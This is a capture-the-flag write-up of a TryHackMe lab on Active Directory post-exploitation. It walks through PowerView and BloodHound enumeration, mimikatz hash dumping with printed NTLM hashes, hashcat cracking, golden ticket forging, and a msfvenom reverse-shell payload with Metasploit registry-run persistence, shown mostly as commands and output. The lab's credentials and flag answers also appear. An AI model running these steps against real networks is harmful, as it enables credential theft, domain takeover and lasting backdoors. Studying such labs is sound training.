HackMDTryHackMe - Post-Exploitation Basics Walkthrough
This room covers basics of post-exploitation and maintaining access with mimikatz, bloodhound, powerview and msfvenom, created by Cryillic.
This room covers:
- Task 1 : Introduction
- Task 2 : Enumeration w/ Powerview
- Task 3 : Enumeration w/ Bloodhound
- Task 4 : Dumping hashes w/ mimikatz
- Task 5 : Golden Ticket Attacks w/ mimikatz
- Task 6 : Enumeration w/ Server Manager
- Task 7 : Maintaining Access
Task 1: Introduction
This room on TryHackME covers the basics of post-exploitation, after gaining acces to an Active Directory AD machine.
Enumeration of this will use tools such as powerview mimikatz and bloodhound. We will dump password hashes and golden tickets using mimikatz, gather information from the windows server then use metasploit to gain persistency into the machine.
Task 2 : Enumeration w/ Powerview
To start the room we can use RDP or SSH into the machine with the credentials:
- Username:
Administrator - Password:
P@$$W0rd - Domain Name:
CONTROLLER
Powerview
This is a powerful powershell script that can be used for enumerating a domain after you have gained a shell in the system.
We can download PowerView from here as PowerView.ps1
- Start Powershell using
powershell -ep bypass.-epbypasses the execution policy of powershell allowing you to easily run scripts. - Start PowerView -
. .\Downloads\PowerView.ps1 - Enumerate the domain users -
Get-NetUser | select cn
Image Not Showing Possible Reasons- The image file may be corrupted
- The server hosting the image is unavailable
- The image path is incorrect
- The image format is not supported
- Enumerate the domain groups -
Get-NetGroup -GroupName *admin*
Image Not Showing Possible Reasons- The image file may be corrupted
- The server hosting the image is unavailable
- The image path is incorrect
- The image format is not supported
Questions
-
What is the shared folder that is not set by default?
Share
Image Not Showing Possible Reasons- The image file may be corrupted
- The server hosting the image is unavailable
- The image path is incorrect
- The image format is not supported
-
What operating system is running inside of the network besides Windows Server 2019?
Windows 10 Enterprise Evaluation
Image Not Showing Possible Reasons- The image file may be corrupted
- The server hosting the image is unavailable
- The image path is incorrect
- The image format is not supported
-
I’ve hidden a flag inside of the users find it.
POST{P0W3RV13W_FTW}
Task 3: Enumeration w/ Bloodhound
Bloodhound is a graphical interface that allows you to visually map out the network.
This tool together with [SharpHound](https://github.com/BloodHoundAD/SharpHound) takes the user, groups, trusts, etc of the network and collects them into .json files to be used inside Bloodhound.
BloodHound Installation
sudo apt install bloodhoundsudo neo4j console
Getting loot w/ SharpHound
powershell -ep bypass. .\Downloads\SharpHound.ps1Invoke-Bloodhound -CollectionMethod All -Domain CONTROLLER.local -ZipFileName loot.zip
PS C:\Users\Administrator> Invoke-Bloodhound -CollectionMethod All -Domain CONTROLLER.local -ZipFileName loot.zip
-----------------------------------------------
Initializing SharpHound at 5:37 AM on 8/11/2022
-----------------------------------------------
Resolved Collection Methods: Group, Sessions, LoggedOn, Trusts, ACL, ObjectProps, LocalGroups, SPNTargets, Container
[+] Creating Schema map for domain CONTROLLER.LOCAL using path CN=Schema,CN=Configuration,DC=CONTROLLER,DC=LOCAL
[+] Cache File not Found: 0 Objects in cache
[+] Pre-populating Domain Controller SIDS
Status: 0 objects finished (+0) -- Using 72 MB RAM
Status: 66 objects finished (+66 33)/s -- Using 80 MB RAM
Enumeration finished in 00:00:02.2222608
Compressing data to C:\Users\Administrator\20220811053745_loot.zip
You can upload this file directly to the UI
SharpHound Enumeration Completed at 5:37 AM on 8/11/2022! Happy Graphing!
Transfer the loot zip file to our attacking machine using scp if connected using ssh
┌─[kali@kali] - [~/Downloads/ctf/thm/post-exploitation]
└─[$] <> scp Administrator@10.10.11.93:20220811025924_loot.zip 20220811025924_loot.zip
Administrator@10.10.11.93's password:
20220811025924_loot. 100% 9539 9.3KB/s 00:01
I experienced issues while running the zip file as bloodhound was reporting bad json. I therefore uploaded the latest version of sharphound as below and used it to get our loot.
┌─[kali@kali] - [~/tools/BloodHound/Collectors]
└─[$] <> scp SharpHound.exe Administrator@10.10.72.5:SharpHound.exe
Administrator@10.10.72.5's password:
SharpHound.exe
PS C:\Users\Administrator> . .\SharpHound.exe --collectionmethods All --domain CONTROLLER.local --zipfilename loot.zip
2022-08-11T06:37:58.3852711-07:00|INFORMATION|This version of SharpHound is compatible with the 4.2 Release of BloodHound
2022-08-11T06:37:58.5571459-07:00|INFORMATION|Resolved Collection Methods: Group, LocalAdmin, GPOLocalGroup, Session, LoggedOn, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote
2022-08-11T06:37:58.5727475-07:00|INFORMATION|Initializing SharpHound at 6:37 AM on 8/11/2022
2022-08-11T06:37:58.9165260-07:00|INFORMATION|Loaded cache with stats: 62 ID to type mappings.
63 name to SID mappings.
0 machine sid mappings.
2 sid to domain mappings.
0 global catalog mappings.
2022-08-11T06:37:58.9321453-07:00|INFORMATION|Flags: Group, LocalAdmin, GPOLocalGroup, Session, LoggedOn, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote
2022-08-11T06:37:59.1040229-07:00|INFORMATION|Producer has finished, closing LDAP channel
2022-08-11T06:37:59.1508947-07:00|INFORMATION|LDAP channel closed, waiting for consumers
2022-08-11T06:38:29.1821539-07:00|INFORMATION|Status: 0 objects finished (+0 0)/s -- Using 40 MB RAM
2022-08-11T06:38:42.5271796-07:00|INFORMATION|Consumers finished, closing output channel
2022-08-11T06:38:42.5583848-07:00|INFORMATION|Output channel closed, waiting for output task to complete
Closing writers
2022-08-11T06:38:42.6521887-07:00|INFORMATION|Status: 104 objects finished (+104 2.418605)/s -- Using 42 MB RAM
2022-08-11T06:38:42.6521887-07:00|INFORMATION|Enumeration finished in 00:00:43.5858822
2022-08-11T06:38:42.7303070-07:00|INFORMATION|Saving cache with stats: 62 ID to type mappings.
64 name to SID mappings.
0 machine sid mappings.
2 sid to domain mappings.
0 global catalog mappings.
2022-08-11T06:38:42.7459344-07:00|INFORMATION|SharpHound Enumeration Completed at 6:38 AM on 8/11/2022! Happy Graphing!
Now we can analyze successfully with Bloodhound
Mapping the network w/ BloodHound
First off we need to start up neo4j before starting Bloodhound in another terminal.
┌─[kali@kali] - [~/Downloads/ctf/thm/post-exploitation]
└─[$] sudo neo4j console
Enter the default credentials for neo4j as neo4j:neo4j on the site that opens up at http://localhost:7474/browser/ login then change the creds to anything you wish as prompted.
Next up launch bloodhound.
Use the Import Graph option or directly drag and drop the zip file onto bloodhound for further analysis.
We can then choose any query we want.
- The image file may be corrupted
- The server hosting the image is unavailable
- The image path is incorrect
- The image format is not supported
Questions
-
What service is also a domain admin?
SQLSERVICE
Image Not Showing Possible Reasons- The image file may be corrupted
- The server hosting the image is unavailable
- The image path is incorrect
- The image format is not supported
-
What two users are Kerberoastable?
SQLSERVICE,KRBTGT
Image Not Showing Possible Reasons- The image file may be corrupted
- The server hosting the image is unavailable
- The image path is incorrect
- The image format is not supported
Task 4 : Dumping hashes w/ mimikatz
Mimikatz is a popular and powerful exploitation tool used for dumping user credentials inside of an active directory network.
We will dump the NTLM hashes with mimikatz and then cracking those hashes using hashcat.
Dump Hashes
Launch Mimikatz from the \Downloads directory and run privilege::debug to ensure that you’re running mimikatz as an administrator, if not mimikatz does not run properly.
- The image file may be corrupted
- The server hosting the image is unavailable
- The image path is incorrect
- The image format is not supported
- The image file may be corrupted
- The server hosting the image is unavailable
- The image path is incorrect
- The image format is not supported
Dump the hashes using lsadump::lsa /patch
mimikatz # lsadump::lsa /patch
Domain : CONTROLLER / S-1-5-21-849420856-2351964222-986696166
RID : 000001f4 (500)
User : Administrator
LM :
NTLM : 2777b7fec870e04dda00cd7260f7bee6
RID : 000001f5 (501)
User : Guest
LM :
NTLM :
RID : 000001f6 (502)
User : krbtgt
LM :
NTLM : 5508500012cc005cf7082a9a89ebdfdf
RID : 0000044f (1103)
User : Machine1
LM :
NTLM : 64f12cddaa88057e06a81b54e73b949b
RID : 00000451 (1105)
User : Admin2
LM :
NTLM : 2b576acbe6bcfda7294d6bd18041b8fe
RID : 00000452 (1106)
User : Machine2
LM :
NTLM : c39f2beb3d2ec06a62cb887fb391dee0
RID : 00000453 (1107)
User : SQLService
LM :
NTLM : f4ab68f27303bcb4024650d8fc5f973a
RID : 00000454 (1108)
User : POST
LM :
NTLM : c4b0e1b10c7ce2c4723b4e2407ef81a2
RID : 00000457 (1111)
User : sshd
LM :
NTLM : 2777b7fec870e04dda00cd7260f7bee6
RID : 000003e8 (1000)
User : DOMAIN-CONTROLL$
LM :
NTLM : 7bb0c59ff58520b2e3ef7d95d294b1a4
RID : 00000455 (1109)
User : DESKTOP-2$
LM :
NTLM : 3c2d4759eb9884d7a935fe71a8e0f54c
RID : 00000456 (1110)
User : DESKTOP-1$
LM :
NTLM : 7d33346eeb11a4f12a6c201faaa0d89a
Cracking the hashes w/ hashcat
For this, we can use rockyou.txt wordlist with the command:
hashcat -m 1000 hash.txt /path/to/rockyou.txt
Questions:
-
What is the Machine1 password?
Password1┌─[kali@kali] - [~/Downloads/ctf/thm/post-exploitation] └─[$] <> hashcat -m 1000 hash.txt /usr/share/wordlists/rockyou.txt hashcat (v6.2.5) starting OpenCL API (OpenCL 3.0 PoCL 3.0+debian Linux, None+Asserts, RELOC, LLVM 13.0.1, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project] ============================================================================================================================================ * Device #1: pthread-Intel(R) Core(TM) i7-4600U CPU @ 2.10GHz, 2917/5899 MB (1024 MB allocatable), 4MCU Minimum password length supported by kernel: 0 Maximum password length supported by kernel: 256 Hashes: 1 digests; 1 unique digests, 1 unique salts Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates Rules: 1 Optimizers applied: * Zero-Byte * Early-Skip * Not-Salted * Not-Iterated * Single-Hash * Single-Salt * Raw-Hash ATTENTION! Pure (unoptimized) backend kernels selected. Pure kernels can crack longer passwords, but drastically reduce performance. If you want to switch to optimized kernels, append -O to your commandline. See the above message to find out about the exact limits. Watchdog: Temperature abort trigger set to 90c Host memory required for this attack: 1 MB Dictionary cache hit: * Filename..: /usr/share/wordlists/rockyou.txt * Passwords.: 14344385 * Bytes.....: 139921507 * Keyspace..: 14344385 64f12cddaa88057e06a81b54e73b949b:Password1 Session..........: hashcat Status...........: Cracked Hash.Mode........: 1000 (NTLM) Hash.Target......: 64f12cddaa88057e06a81b54e73b949b Time.Started.....: Thu Aug 11 11:42:26 2022 (0 secs) Time.Estimated...: Thu Aug 11 11:42:26 2022 (0 secs) Kernel.Feature...: Pure Kernel Guess.Base.......: File (/usr/share/wordlists/rockyou.txt) Guess.Queue......: 1/1 (100.00%) Speed.#1.........: 1508.0 kH/s (0.25ms) @ Accel:512 Loops:1 Thr:1 Vec:8 Recovered........: 1/1 (100.00%) Digests Progress.........: 4096/14344385 (0.03%) Rejected.........: 0/4096 (0.00%) Restore.Point....: 2048/14344385 (0.01%) Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1 Candidate.Engine.: Device Generator Candidates.#1....: slimshady -> oooooo Hardware.Mon.#1..: Util: 29% Started: Thu Aug 11 11:42:25 2022 Stopped: Thu Aug 11 11:42:31 2022 -
What is the Machine2 Hash?
c39f2beb3d2ec06a62cb887fb391dee0RID : 00000454 (1108) User : POST User : Machine2 LM : NTLM : c39f2beb3d2ec06a62cb887fb391dee0
Task 5 : Golden Ticket Attacks w/ mimikatz
A
Golden Ticket attackis a type of attack in which an adversary gains control over an Active Directory Key Distribution Service Account (KRBTGT), and uses that account to forge valid Kerberos Ticket Granting Tickets (TGTs).
From this definition and the previous hashdump that we got, there’s a krbtgt hash.
RID : 000001f6 (502)
User : krbtgt
LM :
NTLM : 5508500012cc005cf7082a9a89ebdfdf
Having the SID and NTLM hash for the krbtgt account will therefore enable us to crease a custom TGT which is the Golden Ticket, therefore allowing us to use any machine or account in the AD network.
With the running mimikatz process running we can run the following but incase you closed it run the following first:
mimikatz # privilege::debug
Privilege '20' OK
Then proceed to dump the hash of krbtgt:
mimikatz # lsadump::lsa /inject /name:krbtgt
Domain : CONTROLLER / S-1-5-21-849420856-2351964222-986696166
RID : 000001f6 (502)
User : krbtgt
* Primary
NTLM : 5508500012cc005cf7082a9a89ebdfdf
LM :
Hash NTLM: 5508500012cc005cf7082a9a89ebdfdf
ntlm- 0: 5508500012cc005cf7082a9a89ebdfdf
lm - 0: 372f405db05d3cafd27f8e6a4a097b2c
* WDigest
01 49a8de3b6c7ae1ddf36aa868e68cd9ea
02 7902703149b131c57e5253fd9ea710d0
03 71288a6388fb28088a434d3705cc6f2a
04 49a8de3b6c7ae1ddf36aa868e68cd9ea
05 7902703149b131c57e5253fd9ea710d0
06 df5ad3cc1ff643663d85dabc81432a81
07 49a8de3b6c7ae1ddf36aa868e68cd9ea
08 a489809bd0f8e525f450fac01ea2054b
09 19e54fd00868c3b0b35b5e0926934c99
10 4462ea84c5537142029ea1b354cd25fa
11 6773fcbf03fd29e51720f2c5087cb81c
12 19e54fd00868c3b0b35b5e0926934c99
13 52902abbeec1f1d3b46a7bd5adab3b57
14 6773fcbf03fd29e51720f2c5087cb81c
15 8f2593c344922717d05d537487a1336d
16 49c009813995b032cc1f1a181eaadee4
17 8552f561e937ad7c13a0dca4e9b0b25a
18 cc18f1d9a1f4d28b58a063f69fa54f27
19 12ae8a0629634a31aa63d6f422a14953
20 b6392b0471c53dd2379dcc570816ba10
21 7ab113cb39aa4be369710f6926b68094
22 7ab113cb39aa4be369710f6926b68094
23 e38f8bc728b21b85602231dba189c5be
24 4700657dde6382cd7b990fb042b00f9e
25 8f46d9db219cbd64fb61ba4fdb1c9ba7
26 36b6a21f031bf361ce38d4d8ad39ee0f
27 e69385ee50f9d3e105f50c61c53e718e
28 ca006400aefe845da46b137b5b50f371
29 15a607251e3a2973a843e09c008c32e3
* Kerberos
Default Salt : CONTROLLER.LOCALkrbtgt
Credentials
des_cbc_md5 : 64ef5d43922f3b5d
* Kerberos-Newer-Keys
Default Salt : CONTROLLER.LOCALkrbtgt
Default Iterations : 4096
Credentials
aes256_hmac (4096) : 8e544cabf340db750cef9f5db7e1a2f97e465dffbd5a2dc64246bda3c75fe53d
aes128_hmac (4096) : 7eb35bddd529c0614e5ad9db4c798066
des_cbc_md5 (4096) : 64ef5d43922f3b5d
* NTLM-Strong-NTOWF
Random Value : 666caaaaf30081f30211bd7fa445fec4
We can create the Golden ticket using any username apart from the SID, domain name and password hash which must be correct with the krbtgt SID and password hash.
mimikatz # kerberos::golden /user:Administrator /domain:controller.local /sid:S-1-5-21-849420856-2351964222-986696166
/krbtgt:5508500012cc005cf7082a9a89ebdfdf /id:500
User : Administrator
Domain : controller.local (CONTROLLER)
SID : S-1-5-21-849420856-2351964222-986696166
User Id : 500
Groups Id : *513 512 520 518 519
ServiceKey: 5508500012cc005cf7082a9a89ebdfdf - rc4_hmac_nt
Lifetime : 8/11/2022 11:19:47 AM ; 8/8/2032 11:19:47 AM ; 8/8/2032 11:19:47 AM
-> Ticket : ticket.kirbi
* PAC generated
* PAC signed
* EncTicketPart generated
* EncTicketPart encrypted
* KrbCred generated
Final Ticket Saved to file !
Use misc::cmd to open a new command prompt with elevated privileges to all machines.
mimikatz # misc::cmd
Patch OK for 'cmd.exe' from 'DisableCMD' to 'KiwiAndCMD' @ 00007FF6427A43B8
Task 6 : Enumeration w/ Server Manager
Servers are hardly ever logged on unless for maintenance, this gives an easy way for enumeration only using the built in windows features such as the server manager
If you have domain admin you have alot of access to the server manager in order to change trusts, add or remove users, look at groups etc, then this can be a great entry point to find other users with other sensitive information on their machines or find other users on the domain network with access to other networks to pivot to another network.
For this we need to rdp into the server as below:
┌─[kali@kali] - [~/Downloads/ctf/thm/post-exploitation]
└─[$] <> rdesktop -u Administrator -d CONTROLLER 10.10.33.104
Enumerate w/ Server Manager
When we open the server we get a number of options(as below) which we can use to enumerate the server, from adding roles, editing them etc. However these can be flagged by system admins.
Navigate to the tools tab and select the Active Directory Users and Computers.
This brings up a list of all users on the domain as well as some other useful tabs such as groups and computers.
Questions
-
What tool allows to view the event logs?
Event Viewer
-
What is the SQL Service password?
MYpassword123#
Task 7 : Maintaining Access
For this lab, we will use Metasploit for persistence, creating a meterpreter shell on the victims machine which we can connect to even if the machine shuts down.
Other means include, advanced backdoors and rootkits, etc.
Generating a payload w/ msfvenom
We can generate a windows meterpreter reverse_tcp shell which we can transfer to our attackbox.
┌─[kali@kali] - [~/Downloads/ctf/thm/post-exploitation]
└─[$] <> msfvenom -p windows/meterpreter/reverse_tcp LHOST={IP} LPORT=4444 -f exe -o shell.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 354 bytes
Final size of exe file: 73802 bytes
Saved as: shell.exe
┌─[kali@kali] - [~/Downloads/ctf/thm/post-exploitation]
└─[$] <> scp shell.exe Administrator@10.10.242.212:shell.exe
┌─[kali@kali] - [~/Downloads/ctf/thm/post-exploitation]
└─[$] <> scp shell.exe Administrator@10.10.136.0:shell.exe
Administrator@10.10.136.0's password:
shell.exe
Once the file is transferred, ssh into the machine and confirm that it was transferred.
┌─[kali@kali] - [~/Downloads/ctf/thm/post-exploitation]
└─[$] <> ssh Administrator@10.10.136.0
Administrator@10.10.136.0's password:
Microsoft Windows [Version 10.0.17763.737]
(c) 2018 Microsoft Corporation. All rights reserved.
controller\administrator@DOMAIN-CONTROLL C:\Users\Administrator>dir
Volume in drive C has no label.
Volume Serial Number is F83F-6346
Directory of C:\Users\Administrator
08/12/2022 01:33 PM <DIR> .
08/12/2022 01:33 PM <DIR> ..
05/13/2020 08:01 PM <DIR> 3D Objects
05/13/2020 08:01 PM <DIR> Contacts
05/13/2020 08:01 PM <DIR> Desktop
05/14/2020 08:27 PM <DIR> Documents
10/03/2020 08:33 AM <DIR> Downloads
05/13/2020 08:01 PM <DIR> Favorites
05/13/2020 08:01 PM <DIR> Links
05/13/2020 08:01 PM <DIR> Music
05/13/2020 08:01 PM <DIR> Pictures
05/13/2020 08:01 PM <DIR> Saved Games
05/13/2020 08:01 PM <DIR> Searches
08/12/2022 01:33 PM 73,802 shell.exe
05/13/2020 08:01 PM <DIR> Videos
1 File(s) 73,802 bytes
14 Dir(s) 52,008,374,272 bytes free
controller\administrator@DOMAIN-CONTROLL C:\Users\Administrator>
On another terminal launch metasploit using msfconsole command and use exploit/multi/handler to listen to the reverse shell.
Set the LHOST and LPORT
Configure our payload to be a windows meterpreter shell using: set payload windows/meterpreter/reverse_tcp
Then run the exploit fist followed by the shell in our attackbox.
┌─[kali@kali] - [~]
└─[$] <> msfconsole -q
msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set LHOST IP
LHOST => IP
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > run
[*] Started reverse TCP handler on IP:4444
[*] Sending stage (175686 bytes) to 10.10.136.0
id
[*] Meterpreter session 11 opened (IP:4444 -> 10.10.136.0:49885) at 2022-08-12 16:49:06 -0400
meterpreter >
Our meterpreter listener will recieve an incoming connection, background the shell using bg in order to run the persistence module.
meterpreter > bg
[*] Backgrounding session 11...
msf6 exploit(multi/handler) > use exploit/windows/local/persistence
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/local/persistence) >
Run the Persistence Module
We will use exploit/windows/local/persistence to send a payload every 10 seconds in defualt.
Set the session to the session that we backgrounded in this case session 11
After which we can run the exploit.
msf6 exploit(windows/local/persistence) > set session 11
session => 11
msf6 exploit(windows/local/persistence) > run
[*] Running persistent module against DOMAIN-CONTROLL via session ID: 11
[+] Persistent VBS script written on DOMAIN-CONTROLL to C:\Users\Administrator\AppData\Local\Temp\AFjTyniKyCbKq.vbs
[*] Installing as HKCU\Software\Microsoft\Windows\CurrentVersion\Run\HbpPWIFt
[+] Installed autorun on DOMAIN-CONTROLL as HKCU\Software\Microsoft\Windows\CurrentVersion\Run\HbpPWIFt
[*] Clean up Meterpreter RC file: /home/kali/.msf4/logs/persistence/DOMAIN-CONTROLL_20220812.5441/DOMAIN-CONTROLL_20220812.5441.rc
On running the pesistence module, the old session dies and a new session is spawned.
Awesome!!!
We are done with a section through the AD journey, I do hope you have gotten to learn something with me.
Happy Hacking!!!
